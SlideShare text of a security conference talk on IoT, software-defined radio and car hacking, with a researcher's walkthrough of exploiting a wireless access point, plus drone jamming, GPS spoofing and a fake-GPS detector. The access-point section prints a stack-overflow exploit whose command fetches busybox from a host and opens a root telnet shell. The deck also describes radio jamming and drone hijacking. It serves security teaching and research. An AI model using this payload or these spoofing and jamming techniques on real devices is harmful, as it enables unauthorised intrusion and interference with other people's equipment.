SlideShare una empresa de Scribd logo
1 de 80
Descargar para leer sin conexión
IoT, SDR, and Car Security
Aaron Luo
Agenda
• How to hacking IoT?
– Hardware
– Software
– Radio Signal
– Real Case
• Introduce the Car Architecture
• Hacking the Car
3
From Attacker’s View
• Physical
– Network Switchboard
– USB Slug
• Radio
– Wifi, Bluetooth, ZigBee, Z-wave, AM, FM, GPS, GSM…etc.
• Network
– Web Server/Client
– Firmware Update
– Hidden Service Port
• Human
– Phishing
– Default Password
How to hacking? (Before disassemble)
• Scanning open services
– Nmap
• Sniff traffics
– Router - tcpdump
– Mirror port
– Build bridge network
– Wifi hotspot
– Arp spoofing
– SDR
• Download the firmware
– From website
– From firmware update module
Sniff traffics – Router
• Software router – pfSense
Sniff traffics – Mirror port
• LAN Tap Pro
Sniff traffics – Build bridge network
• RaspberryPI
• External Ethernet card*1
ifconfig eth0 0.0.0.0 promisc up
Ifconfig eth1 0.0.0.0 promisc up
Brctl addbr br0
Brctl addif br0 eth0
Brctl addif br0 eth1
Ifconfig br0 up
tcpdump -i eth0
Sniff traffics – Arp Spoofing
• ettercap
• arpspoof+mitmproxy
Sniff traffics - SDR
• Software-Defined Radio
– Generate any radio protocol if device support that frequency
– Writing Modulation / Demodulation program by yourself
– Simply inspect the radio spectrum
How to hacking? (After disassemble)
• Identify chipsets
• Find out the debug port
– UART
– SWD
– JTAG
• Dump the flash rom
– Bus Pirate
• Analysis the signal
– Logic Analyzer
Identify chipsets
• Remove the glue
• Google same type chipsets to compare datasheet
Find out debug port
• UART
– TX
– RX
– GND
– VCC
• SWD
– SWDIO
– SWCLK
– GND
– VCC
• JTAG
– TDI
– TDO
– GND
– VCC
Dump the Rom
• Bus Pirate
• Dump EEPROM via SPI
(reference from http://iotpentest.com/how-to-dump-the-firmware-from-the-router-using-buspirate/)
Analysis the signal
• Saleae Logic Analyzer
– Just care the GND
A real case
Wireless AP
Disassemble
Find out debug port – part 1
• Special unused 4 port
– Guess it’s debug port
– welding
Find out debug port – part 2
• Find out the GND
Find out debug port – part 3
• Test ports
Find out debug port – part 4
• Measure the voltage
Find out debug port – part 5
• Analysis the signal with Logic Analyzer
– GND-GND
Find out debug port – part 6
• Analysis the signal with Logic Analyzer
Find out debug port – part 7
• Analysis the signal with Logic Analyzer
– Calculate the baudrate
– 1/0.00001725 ~= 57971
– General baudrate:
300,1200,2400,4800,9600,14400,19200,28800,38400,57600,115200
Find out debug port – part 8
• Analysis the signal with Logic Analyzer
– Decode with Async Serial
– Baudrate 57600
Find out debug port – part 9
• Analysis the signal with Logic Analyzer
– Finally decode the signal
Find out debug port – part 10
• Analysis the signal with Logic Analyzer
– Finally we know…
Find out debug port – part 11
• Connect to USBTTL
– GND-GND
– TXD-RXD
– RXD-TXD
Find out debug port – part 12
• Finally we got the Putty shell
Key mapping is wrong?
• 0x13 -> v
• 0x14 -> ?
• 0x15 -> u
• 0x16 -> ?
• 0x17 -> t
• I follow this strange rule to write the decoder
char asciitable[] = " !"#$%&'()*+,-
./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[]^_`abcdefghijklmnopqrstuvwxyz{|}~";
for (int i=0;i<sizeof(asciitable)-1;i++)
{
if (tmpchr == asciitable[i])
{
tmpinput[inputpos++] = 0x03+(sizeof(asciitable)-2-i)*2;
}
}
But Why?
Just because RXD did not weld well
Just because RXD did not weld well
Just because RXD did not weld well
Pick up the filesystem
• tar -zcvf /www/fs.tar.gz /
Find the vulnerability – part 1
• Fuzzing the website
– httpClient.request("POST","/login.html","a"*(30000)
• /usr/sbin/httpd will crash
Find the vulnerability – part 2
• Upload gdbserver (mips version) for remote debugging
– /usr/sbin/httpd; ./gdbserver --attach 0.0.0.0:5555 `pidof httpd`
Find the vulnerability – part 3
• Stack overflow
• Finally located the crash function
– /usr/sbin/httpd 0x0040D44C
• If stack is incorrect it will crash before control the ra(ip)
• So need to dump original stack to fix
– dump memory stack.bin $sp $sp+26000
• ASLR is enabled
– # cat /proc/sys/kernel/randomize_va_space
– 1
Find the vulnerability – part 4
• Control the ra (ip)
origstack = "x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x01x00x00x00x00x00x00x00“
s0 = "x41x41x41x41"
s1 = "x00x00x54x00"
s2 = "x43x43x43x43"
s3 = "x44x44x44x44"
s4 = "x8Cx8Ex4Fx00"
s5 = "x46x46x46x46"
s6 = "x60xE2x53x00"
s7 = "x04x00x00x00"
s8 = "x49x49x49x49"
ra = "x78x56x34x12“
• httpClient.request("POST","/login.html","a"*(25262)+origstac
k+s0+s1+s2+s3+s4+s5+s6+s7+s8+ra)
aaaa..(25262 bytes)
Original Stack
Variables(48 bytes)
Register S0~S8
(36 bytes)
Return Address
(0x12345678)
Find the vulnerability – part 5
• Bypass the ASLR
– 1 – Conservative randomization. Shared libraries, stack, mmap(), VDSO
and heap are randomized.
– Find rop chain on self program
Finally we got the RCE root shell
origstack = "x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x01x00x00x00x00x00x00x00"
s0 = "x41x41x41x41"
s1 = "x00x00x54x00"
s2 = "x43x43x43x43"
s3 = "x44x44x44x44"
s4 = "x8Cx8Ex4Fx00"
s5 = "x46x46x46x46"
s6 = "x60xE2x53x00"
s7 = "x04x00x00x00"
s8 = "x49x49x49x49"
ra = "x58x79x40x00"
command = "wget -O /tmp/busybox-mipsel http://192.168.11.4:8080/busybox-mipsel && chmod 755
/tmp/busybox-mipsel && cd /tmp && ./busybox-mipsel telnetd -l /bin/sh -p 2323"
httpClient.request("POST","/login.html","a"*(25262)+origstack+s0+s1+s2+s3+s4+s5+s6+s7+s8+ra+"a"*32+co
mmand,headers)
aaaa..(25262 bytes)
Original Stack
Variables(48 bytes)
Register S0~S8
(36 bytes)
Return Address
(return to system())
aaaa..(32 bytes)
CommandLine
Ascii String
Let’s play SDR (software defined radio)
What is SDR
• Software-Defined Radio
– Generate any radio protocol if device support that frequency
– Writing Modulation / Demodulation program by yourself
– Simply inspect the radio spectrum
SDR Tools
• HackRF tools
• Gqrx - Display the spectrum waterfall
• GNURadio – GUI tool for modulation/demodulation
• OpenBTS – open source tool for building GSM Station
• Artemis – Identify protocol
• Baudline – for analysis the I/Q data
If you have the SDR
Sniffing walkie-talkie conversation
DEMO
Jamming the radio signal (like DDOS)
DEMO
Sniffing airplane <-> ground station ads-b signal
Sniffing GSM – SMS traffic
Putting some image on spectrum
spectrum_painter
The Real Case
DJI-Phantom 3 Advanced
Let’s analysis the Drone radio
• How to find the frequency?
– FCC ID
– Inspect by SDR
Radio Signal Analysis
P3A use two modulation/demodulation
to transfer data with 2.4GHz ISM band
RC to Drone radio spectrum (FHSS)
• Control drone direction (up down left right)
• Frequency 2.400~2.483GHz, each channel about 1MHz
DSSS - Drone to RC radio spectrum
• For drone to remote controller image transmission
• Frequency 2.4015~2.4815 GHz
• split into 6 channels, each channel is about 10MHz
Finally we found…
• Images have no checksum mechanism, so we can
jamming the radio frequency to show wrong image to
controller
DEMO
Next section:
GPS Modules
Live Demo
(open your mobile maps)
Which function is associate with GPS?
• No-fly zone
• Return to home
• Follow me
• Waypoint
How to spoof the GPS location?
• Use the SDR
• There have a good open-source GPS simulator in GitHub,
called gps-sdr-sim, but it have some limitation, before you
want fake a location, should wait for few minutes to generate
the I/Q data
• So we improve the code, let it can in real-time generate GPS
signal and can be controlled with the joystick.
DEMO
Control GPS by Joystick
How to Increase the radio range?
• Buy some active directional antenna
DEMO
Hijacking Drone by Joystick
How to detect the fake GPS signal?
• You need a GPS module to debug GPS signals.
– U-blox M8N
How to detect the fake GPS signal?
• Validate the time between satellite time and real time
How to detect the fake GPS signal?
• Check the motion speed between point to point
– For example it is impossible to change your location from Taiwan to
Serbia in one second
How to detect the fake GPS signal?
• Validate the GPS sub-frame data
Develop the fake GPS detector
• Board: RaspberryPI
• GPS modules: u-blox
DEMO
Catch The Bad Guys
Car Security
Car Architecture
(Reference from: http://knoppix.ru/sentinel/130312.html)
CAN-BUS Network
(Reference from: http://www.aa1car.com/library/can_systems.htm)
Remote attack vector
• Remote keyless
• IVI System
• Wireless - OBDII dongle
Remote keyless
• SDR
– Record/Replay
– Analysis the protocol
– Proxy Tunnel
IVI System
• Connected with can-bus
• Wifi
• Bluetooth
• Radio
• Web browser
DEMO
Conclusion
• IoT threats come from multi-dimensional
– In addition to traditional IP network protocols, there are various types
of radio protocols
• Be careful CAN-BUS network with in-car wireless device
• Comprehensive protection strategy is needed
Q&A(aaronluo17@gmail.com)
Thank you

Más contenido relacionado

La actualidad más candente

The IoT Academy IoT training Arduino Part 5 Arduino peripherals
The IoT Academy IoT training Arduino Part 5 Arduino peripheralsThe IoT Academy IoT training Arduino Part 5 Arduino peripherals
The IoT Academy IoT training Arduino Part 5 Arduino peripheralsThe IOT Academy
 
How to convert your Linux box into Security Gateway - Part 1
How to convert your Linux box into Security Gateway - Part 1How to convert your Linux box into Security Gateway - Part 1
How to convert your Linux box into Security Gateway - Part 1n|u - The Open Security Community
 
Handling Interrupts in Microchip MCUs
Handling Interrupts in Microchip MCUsHandling Interrupts in Microchip MCUs
Handling Interrupts in Microchip MCUsCorrado Santoro
 
Weapons grade React by Ken Wheeler
Weapons grade React by Ken Wheeler Weapons grade React by Ken Wheeler
Weapons grade React by Ken Wheeler React London 2017
 
Practical reverse engineering and exploit development for AVR-based Embedded ...
Practical reverse engineering and exploit development for AVR-based Embedded ...Practical reverse engineering and exploit development for AVR-based Embedded ...
Practical reverse engineering and exploit development for AVR-based Embedded ...Alexander Bolshev
 
icd_lrs_may2_00_ATE_Hyb.
icd_lrs_may2_00_ATE_Hyb.icd_lrs_may2_00_ATE_Hyb.
icd_lrs_may2_00_ATE_Hyb.Laird Snowden
 
Raspberry Pi - best friend for all your GPIO needs
Raspberry Pi - best friend for all your GPIO needsRaspberry Pi - best friend for all your GPIO needs
Raspberry Pi - best friend for all your GPIO needsDobrica Pavlinušić
 
Predicting and Abusing WPA2/802.11 Group Keys
Predicting and Abusing WPA2/802.11 Group KeysPredicting and Abusing WPA2/802.11 Group Keys
Predicting and Abusing WPA2/802.11 Group Keysvanhoefm
 
Using Timer2 in Microchip MCUs
Using Timer2 in Microchip MCUsUsing Timer2 in Microchip MCUs
Using Timer2 in Microchip MCUsCorrado Santoro
 
Deep submicron-backdoors-ortega-syscan-2014-slides
Deep submicron-backdoors-ortega-syscan-2014-slidesDeep submicron-backdoors-ortega-syscan-2014-slides
Deep submicron-backdoors-ortega-syscan-2014-slidesortegaalfredo
 
A Drone Tale by Paolo Stagno - Hacktivity 2018
A Drone Tale by Paolo Stagno - Hacktivity 2018A Drone Tale by Paolo Stagno - Hacktivity 2018
A Drone Tale by Paolo Stagno - Hacktivity 2018Paolo Stagno
 
A Drone Tale by Paolo Stagno - Sec-T 2018
A Drone Tale by Paolo Stagno - Sec-T 2018A Drone Tale by Paolo Stagno - Sec-T 2018
A Drone Tale by Paolo Stagno - Sec-T 2018Paolo Stagno
 
Embedded Recipes 2019 - Introduction to JTAG debugging
Embedded Recipes 2019 - Introduction to JTAG debuggingEmbedded Recipes 2019 - Introduction to JTAG debugging
Embedded Recipes 2019 - Introduction to JTAG debuggingAnne Nicolas
 
Computers or something
Computers or somethingComputers or something
Computers or somethingdattmamon
 
FSEC 2014 - I can haz your board with JTAG
FSEC 2014 - I can haz your board with JTAGFSEC 2014 - I can haz your board with JTAG
FSEC 2014 - I can haz your board with JTAGDobrica Pavlinušić
 
Controlling the internet of things using wearable tech - Design+Code Day; Ara...
Controlling the internet of things using wearable tech - Design+Code Day; Ara...Controlling the internet of things using wearable tech - Design+Code Day; Ara...
Controlling the internet of things using wearable tech - Design+Code Day; Ara...ArabNet ME
 
PLNOG 6: Rafał Szarecki - Routing w Sieci - Praktyczne aspekty implementacji ...
PLNOG 6: Rafał Szarecki - Routing w Sieci - Praktyczne aspekty implementacji ...PLNOG 6: Rafał Szarecki - Routing w Sieci - Praktyczne aspekty implementacji ...
PLNOG 6: Rafał Szarecki - Routing w Sieci - Praktyczne aspekty implementacji ...PROIDEA
 
Hardware hacking for software people
Hardware hacking for software peopleHardware hacking for software people
Hardware hacking for software peopleDobrica Pavlinušić
 
Using ARM Dev.Board in physical experimental instruments
Using ARM Dev.Board in physical experimental instrumentsUsing ARM Dev.Board in physical experimental instruments
Using ARM Dev.Board in physical experimental instrumentsa_n0v
 
Getting Started with Raspberry Pi - USC 2013
Getting Started with Raspberry Pi - USC 2013Getting Started with Raspberry Pi - USC 2013
Getting Started with Raspberry Pi - USC 2013Tom Paulus
 

La actualidad más candente (20)

The IoT Academy IoT training Arduino Part 5 Arduino peripherals
The IoT Academy IoT training Arduino Part 5 Arduino peripheralsThe IoT Academy IoT training Arduino Part 5 Arduino peripherals
The IoT Academy IoT training Arduino Part 5 Arduino peripherals
 
How to convert your Linux box into Security Gateway - Part 1
How to convert your Linux box into Security Gateway - Part 1How to convert your Linux box into Security Gateway - Part 1
How to convert your Linux box into Security Gateway - Part 1
 
Handling Interrupts in Microchip MCUs
Handling Interrupts in Microchip MCUsHandling Interrupts in Microchip MCUs
Handling Interrupts in Microchip MCUs
 
Weapons grade React by Ken Wheeler
Weapons grade React by Ken Wheeler Weapons grade React by Ken Wheeler
Weapons grade React by Ken Wheeler
 
Practical reverse engineering and exploit development for AVR-based Embedded ...
Practical reverse engineering and exploit development for AVR-based Embedded ...Practical reverse engineering and exploit development for AVR-based Embedded ...
Practical reverse engineering and exploit development for AVR-based Embedded ...
 
icd_lrs_may2_00_ATE_Hyb.
icd_lrs_may2_00_ATE_Hyb.icd_lrs_may2_00_ATE_Hyb.
icd_lrs_may2_00_ATE_Hyb.
 
Raspberry Pi - best friend for all your GPIO needs
Raspberry Pi - best friend for all your GPIO needsRaspberry Pi - best friend for all your GPIO needs
Raspberry Pi - best friend for all your GPIO needs
 
Predicting and Abusing WPA2/802.11 Group Keys
Predicting and Abusing WPA2/802.11 Group KeysPredicting and Abusing WPA2/802.11 Group Keys
Predicting and Abusing WPA2/802.11 Group Keys
 
Using Timer2 in Microchip MCUs
Using Timer2 in Microchip MCUsUsing Timer2 in Microchip MCUs
Using Timer2 in Microchip MCUs
 
Deep submicron-backdoors-ortega-syscan-2014-slides
Deep submicron-backdoors-ortega-syscan-2014-slidesDeep submicron-backdoors-ortega-syscan-2014-slides
Deep submicron-backdoors-ortega-syscan-2014-slides
 
A Drone Tale by Paolo Stagno - Hacktivity 2018
A Drone Tale by Paolo Stagno - Hacktivity 2018A Drone Tale by Paolo Stagno - Hacktivity 2018
A Drone Tale by Paolo Stagno - Hacktivity 2018
 
A Drone Tale by Paolo Stagno - Sec-T 2018
A Drone Tale by Paolo Stagno - Sec-T 2018A Drone Tale by Paolo Stagno - Sec-T 2018
A Drone Tale by Paolo Stagno - Sec-T 2018
 
Embedded Recipes 2019 - Introduction to JTAG debugging
Embedded Recipes 2019 - Introduction to JTAG debuggingEmbedded Recipes 2019 - Introduction to JTAG debugging
Embedded Recipes 2019 - Introduction to JTAG debugging
 
Computers or something
Computers or somethingComputers or something
Computers or something
 
FSEC 2014 - I can haz your board with JTAG
FSEC 2014 - I can haz your board with JTAGFSEC 2014 - I can haz your board with JTAG
FSEC 2014 - I can haz your board with JTAG
 
Controlling the internet of things using wearable tech - Design+Code Day; Ara...
Controlling the internet of things using wearable tech - Design+Code Day; Ara...Controlling the internet of things using wearable tech - Design+Code Day; Ara...
Controlling the internet of things using wearable tech - Design+Code Day; Ara...
 
PLNOG 6: Rafał Szarecki - Routing w Sieci - Praktyczne aspekty implementacji ...
PLNOG 6: Rafał Szarecki - Routing w Sieci - Praktyczne aspekty implementacji ...PLNOG 6: Rafał Szarecki - Routing w Sieci - Praktyczne aspekty implementacji ...
PLNOG 6: Rafał Szarecki - Routing w Sieci - Praktyczne aspekty implementacji ...
 
Hardware hacking for software people
Hardware hacking for software peopleHardware hacking for software people
Hardware hacking for software people
 
Using ARM Dev.Board in physical experimental instruments
Using ARM Dev.Board in physical experimental instrumentsUsing ARM Dev.Board in physical experimental instruments
Using ARM Dev.Board in physical experimental instruments
 
Getting Started with Raspberry Pi - USC 2013
Getting Started with Raspberry Pi - USC 2013Getting Started with Raspberry Pi - USC 2013
Getting Started with Raspberry Pi - USC 2013
 

Similar a Birds of a Feather 2017: 邀請分享 IoT, SDR, and Car Security - Aaron

SDR Basestation with Raspberry Pi
SDR Basestation with Raspberry PiSDR Basestation with Raspberry Pi
SDR Basestation with Raspberry PiJonathan Singer
 
D1 t1 t. yunusov k. nesterov - bootkit via sms
D1 t1   t. yunusov k. nesterov - bootkit via smsD1 t1   t. yunusov k. nesterov - bootkit via sms
D1 t1 t. yunusov k. nesterov - bootkit via smsqqlan
 
Introduction to Software Defined Radio (SDR) on Linux
Introduction to Software Defined Radio (SDR) on LinuxIntroduction to Software Defined Radio (SDR) on Linux
Introduction to Software Defined Radio (SDR) on LinuxPamela O'Shea
 
Asegúr@IT 7: Playing with Satellites 1.2
Asegúr@IT 7: Playing with Satellites 1.2Asegúr@IT 7: Playing with Satellites 1.2
Asegúr@IT 7: Playing with Satellites 1.2Chema Alonso
 
OSINT RF Reverse Engineering by Marc Newlin
OSINT RF Reverse Engineering by Marc NewlinOSINT RF Reverse Engineering by Marc Newlin
OSINT RF Reverse Engineering by Marc NewlinEC-Council
 
Playing in a Satellite environment
Playing in a Satellite environmentPlaying in a Satellite environment
Playing in a Satellite environmentChristian Martorella
 
Network Scanning Phases and Supporting Tools
Network Scanning Phases and Supporting ToolsNetwork Scanning Phases and Supporting Tools
Network Scanning Phases and Supporting ToolsJoseph Bugeja
 
lecture5.pptx
lecture5.pptxlecture5.pptx
lecture5.pptxLlobarro2
 
Costruiamo un Rover in 60 minuti
Costruiamo un Rover in 60 minutiCostruiamo un Rover in 60 minuti
Costruiamo un Rover in 60 minutiCodemotion
 
Hacking a Xiami Mi Vacuum Robot
Hacking a Xiami Mi Vacuum RobotHacking a Xiami Mi Vacuum Robot
Hacking a Xiami Mi Vacuum RobotPaul Terrasi
 
Bh fed-03-kaminsky
Bh fed-03-kaminskyBh fed-03-kaminsky
Bh fed-03-kaminskyDan Kaminsky
 
Plane Spotting
Plane SpottingPlane Spotting
Plane SpottingTed Coyle
 
Root via SMS: 4G access level security assessment, Sergey Gordeychik, Alexand...
Root via SMS: 4G access level security assessment, Sergey Gordeychik, Alexand...Root via SMS: 4G access level security assessment, Sergey Gordeychik, Alexand...
Root via SMS: 4G access level security assessment, Sergey Gordeychik, Alexand...Sergey Gordeychik
 
IPv6 Fundamentals & Securities
IPv6 Fundamentals & SecuritiesIPv6 Fundamentals & Securities
IPv6 Fundamentals & SecuritiesDon Anto
 
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...Alexandre Moneger
 
Attacking GRX - GPRS Roaming eXchange
Attacking GRX - GPRS Roaming eXchangeAttacking GRX - GPRS Roaming eXchange
Attacking GRX - GPRS Roaming eXchangeP1Security
 
2015 02 28 DotNetSpain IoT Fight
2015 02 28 DotNetSpain IoT Fight2015 02 28 DotNetSpain IoT Fight
2015 02 28 DotNetSpain IoT FightBruno Capuano
 
Protocol T50: Five months later... So what?
Protocol T50: Five months later... So what?Protocol T50: Five months later... So what?
Protocol T50: Five months later... So what?Nelson Brito
 
When a robot is smart enough?
When a robot is smart enough?When a robot is smart enough?
When a robot is smart enough?Tomáš Jukin
 

Similar a Birds of a Feather 2017: 邀請分享 IoT, SDR, and Car Security - Aaron (20)

SDR Basestation with Raspberry Pi
SDR Basestation with Raspberry PiSDR Basestation with Raspberry Pi
SDR Basestation with Raspberry Pi
 
D1 t1 t. yunusov k. nesterov - bootkit via sms
D1 t1   t. yunusov k. nesterov - bootkit via smsD1 t1   t. yunusov k. nesterov - bootkit via sms
D1 t1 t. yunusov k. nesterov - bootkit via sms
 
Introduction to Software Defined Radio (SDR) on Linux
Introduction to Software Defined Radio (SDR) on LinuxIntroduction to Software Defined Radio (SDR) on Linux
Introduction to Software Defined Radio (SDR) on Linux
 
Asegúr@IT 7: Playing with Satellites 1.2
Asegúr@IT 7: Playing with Satellites 1.2Asegúr@IT 7: Playing with Satellites 1.2
Asegúr@IT 7: Playing with Satellites 1.2
 
OSINT RF Reverse Engineering by Marc Newlin
OSINT RF Reverse Engineering by Marc NewlinOSINT RF Reverse Engineering by Marc Newlin
OSINT RF Reverse Engineering by Marc Newlin
 
Playing in a Satellite environment
Playing in a Satellite environmentPlaying in a Satellite environment
Playing in a Satellite environment
 
Network Scanning Phases and Supporting Tools
Network Scanning Phases and Supporting ToolsNetwork Scanning Phases and Supporting Tools
Network Scanning Phases and Supporting Tools
 
lecture5.pptx
lecture5.pptxlecture5.pptx
lecture5.pptx
 
Costruiamo un Rover in 60 minuti
Costruiamo un Rover in 60 minutiCostruiamo un Rover in 60 minuti
Costruiamo un Rover in 60 minuti
 
Hacking a Xiami Mi Vacuum Robot
Hacking a Xiami Mi Vacuum RobotHacking a Xiami Mi Vacuum Robot
Hacking a Xiami Mi Vacuum Robot
 
Bh fed-03-kaminsky
Bh fed-03-kaminskyBh fed-03-kaminsky
Bh fed-03-kaminsky
 
Plane Spotting
Plane SpottingPlane Spotting
Plane Spotting
 
Root via SMS: 4G access level security assessment, Sergey Gordeychik, Alexand...
Root via SMS: 4G access level security assessment, Sergey Gordeychik, Alexand...Root via SMS: 4G access level security assessment, Sergey Gordeychik, Alexand...
Root via SMS: 4G access level security assessment, Sergey Gordeychik, Alexand...
 
IPv6 Fundamentals & Securities
IPv6 Fundamentals & SecuritiesIPv6 Fundamentals & Securities
IPv6 Fundamentals & Securities
 
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...
 
Attacking GRX - GPRS Roaming eXchange
Attacking GRX - GPRS Roaming eXchangeAttacking GRX - GPRS Roaming eXchange
Attacking GRX - GPRS Roaming eXchange
 
2015 02 28 DotNetSpain IoT Fight
2015 02 28 DotNetSpain IoT Fight2015 02 28 DotNetSpain IoT Fight
2015 02 28 DotNetSpain IoT Fight
 
Protocol T50: Five months later... So what?
Protocol T50: Five months later... So what?Protocol T50: Five months later... So what?
Protocol T50: Five months later... So what?
 
When a robot is smart enough?
When a robot is smart enough?When a robot is smart enough?
When a robot is smart enough?
 
Network traffic analysis course
Network traffic analysis courseNetwork traffic analysis course
Network traffic analysis course
 

Más de HITCON GIRLS

20200810_資訊洩漏所帶來的資安問題_turkey
20200810_資訊洩漏所帶來的資安問題_turkey20200810_資訊洩漏所帶來的資安問題_turkey
20200810_資訊洩漏所帶來的資安問題_turkeyHITCON GIRLS
 
CYBERSEC 2020 臺灣資安大會 windows malware hot 5 - 短短
CYBERSEC 2020 臺灣資安大會 windows malware hot 5  - 短短CYBERSEC 2020 臺灣資安大會 windows malware hot 5  - 短短
CYBERSEC 2020 臺灣資安大會 windows malware hot 5 - 短短HITCON GIRLS
 
HITCON CTF 介紹 - HG 導覽活動
HITCON CTF 介紹 - HG 導覽活動HITCON CTF 介紹 - HG 導覽活動
HITCON CTF 介紹 - HG 導覽活動HITCON GIRLS
 
HITCON CTF 2019 特色 - HG 導覽活動
HITCON CTF 2019 特色 - HG 導覽活動HITCON CTF 2019 特色 - HG 導覽活動
HITCON CTF 2019 特色 - HG 導覽活動HITCON GIRLS
 
HITCON CTF 2017 特色 - HG 導覽活動
HITCON CTF 2017 特色 - HG 導覽活動HITCON CTF 2017 特色 - HG 導覽活動
HITCON CTF 2017 特色 - HG 導覽活動HITCON GIRLS
 
HITCON CTF 2016 特色 - HG 導覽活動
HITCON CTF 2016 特色 - HG 導覽活動HITCON CTF 2016 特色 - HG 導覽活動
HITCON CTF 2016 特色 - HG 導覽活動HITCON GIRLS
 
iThome 資安大會 2019 資安大會_AI 的逆襲,眼見真的為憑嗎? - Turkey&Melody.pdf
iThome 資安大會 2019 資安大會_AI 的逆襲,眼見真的為憑嗎? - Turkey&Melody.pdfiThome 資安大會 2019 資安大會_AI 的逆襲,眼見真的為憑嗎? - Turkey&Melody.pdf
iThome 資安大會 2019 資安大會_AI 的逆襲,眼見真的為憑嗎? - Turkey&Melody.pdfHITCON GIRLS
 
iThome 資安大會 2019 駭客如何利用公開工具在內部網路中暢行無阻 - YCY.pdf
iThome 資安大會 2019 駭客如何利用公開工具在內部網路中暢行無阻 - YCY.pdfiThome 資安大會 2019 駭客如何利用公開工具在內部網路中暢行無阻 - YCY.pdf
iThome 資安大會 2019 駭客如何利用公開工具在內部網路中暢行無阻 - YCY.pdfHITCON GIRLS
 
Birds of a Feather 2017: 邀請分享 Light Up The Korean DarkWeb - Dasom Kim
Birds of a Feather 2017: 邀請分享 Light Up The Korean DarkWeb - Dasom KimBirds of a Feather 2017: 邀請分享 Light Up The Korean DarkWeb - Dasom Kim
Birds of a Feather 2017: 邀請分享 Light Up The Korean DarkWeb - Dasom KimHITCON GIRLS
 
Birds of a Feather 2017: 邀請分享 Glance into the Enterprise InfoSec Field - Howard
Birds of a Feather 2017: 邀請分享 Glance into the Enterprise InfoSec Field - HowardBirds of a Feather 2017: 邀請分享 Glance into the Enterprise InfoSec Field - Howard
Birds of a Feather 2017: 邀請分享 Glance into the Enterprise InfoSec Field - HowardHITCON GIRLS
 
Birds of a Feather 2017: 邀請分享 Place of Attribution in Threat Intelligence - F...
Birds of a Feather 2017: 邀請分享 Place of Attribution in Threat Intelligence - F...Birds of a Feather 2017: 邀請分享 Place of Attribution in Threat Intelligence - F...
Birds of a Feather 2017: 邀請分享 Place of Attribution in Threat Intelligence - F...HITCON GIRLS
 
未來大人物【互動工作坊】社群網路滲透生活,我們如何保護個資不外洩 蜘子珣&Turkey
未來大人物【互動工作坊】社群網路滲透生活,我們如何保護個資不外洩 蜘子珣&Turkey未來大人物【互動工作坊】社群網路滲透生活,我們如何保護個資不外洩 蜘子珣&Turkey
未來大人物【互動工作坊】社群網路滲透生活,我們如何保護個資不外洩 蜘子珣&TurkeyHITCON GIRLS
 
HITCON GIRLS 資安萌芽推廣 2017: 從 CVE 找材料
HITCON GIRLS 資安萌芽推廣 2017: 從 CVE 找材料HITCON GIRLS 資安萌芽推廣 2017: 從 CVE 找材料
HITCON GIRLS 資安萌芽推廣 2017: 從 CVE 找材料HITCON GIRLS
 
HITCON GIRLS 資安萌芽推廣 2017: 你知道你連線的網站黑黑的嗎
HITCON GIRLS 資安萌芽推廣 2017: 你知道你連線的網站黑黑的嗎HITCON GIRLS 資安萌芽推廣 2017: 你知道你連線的網站黑黑的嗎
HITCON GIRLS 資安萌芽推廣 2017: 你知道你連線的網站黑黑的嗎HITCON GIRLS
 
HITCON GIRLS 資安萌芽推廣 2017: 密碼學深入淺出 阿毛 - 台科資管碩士生&圓圓 - 台科資管碩士生
HITCON GIRLS 資安萌芽推廣 2017: 密碼學深入淺出 阿毛 - 台科資管碩士生&圓圓 - 台科資管碩士生HITCON GIRLS 資安萌芽推廣 2017: 密碼學深入淺出 阿毛 - 台科資管碩士生&圓圓 - 台科資管碩士生
HITCON GIRLS 資安萌芽推廣 2017: 密碼學深入淺出 阿毛 - 台科資管碩士生&圓圓 - 台科資管碩士生HITCON GIRLS
 
HITCON GIRLS 資安萌芽推廣 2017: 探索駭客的世界 - Turkey
HITCON GIRLS 資安萌芽推廣 2017: 探索駭客的世界 - TurkeyHITCON GIRLS 資安萌芽推廣 2017: 探索駭客的世界 - Turkey
HITCON GIRLS 資安萌芽推廣 2017: 探索駭客的世界 - TurkeyHITCON GIRLS
 
HITCON GIRLS 資安萌芽推廣 2017: 還能不能好好玩遊戲了
HITCON GIRLS 資安萌芽推廣 2017: 還能不能好好玩遊戲了HITCON GIRLS 資安萌芽推廣 2017: 還能不能好好玩遊戲了
HITCON GIRLS 資安萌芽推廣 2017: 還能不能好好玩遊戲了HITCON GIRLS
 
HITCON GIRLS 資安萌芽推廣 2017: 從研究生轉職資安工程師 - 蜘子珣
HITCON GIRLS 資安萌芽推廣 2017: 從研究生轉職資安工程師 - 蜘子珣HITCON GIRLS 資安萌芽推廣 2017: 從研究生轉職資安工程師 - 蜘子珣
HITCON GIRLS 資安萌芽推廣 2017: 從研究生轉職資安工程師 - 蜘子珣HITCON GIRLS
 
HITCON GIRLS 資安萌芽推廣 2017: 資安工作很酷嘛?當然! - Belinda
HITCON GIRLS 資安萌芽推廣 2017: 資安工作很酷嘛?當然! - BelindaHITCON GIRLS 資安萌芽推廣 2017: 資安工作很酷嘛?當然! - Belinda
HITCON GIRLS 資安萌芽推廣 2017: 資安工作很酷嘛?當然! - BelindaHITCON GIRLS
 
逃避可恥還沒有用- 你不可不知的物聯網安全問題與挑戰(Ashley Shen & Belinda Lai)
逃避可恥還沒有用- 你不可不知的物聯網安全問題與挑戰(Ashley Shen & Belinda Lai)逃避可恥還沒有用- 你不可不知的物聯網安全問題與挑戰(Ashley Shen & Belinda Lai)
逃避可恥還沒有用- 你不可不知的物聯網安全問題與挑戰(Ashley Shen & Belinda Lai)HITCON GIRLS
 

Más de HITCON GIRLS (20)

20200810_資訊洩漏所帶來的資安問題_turkey
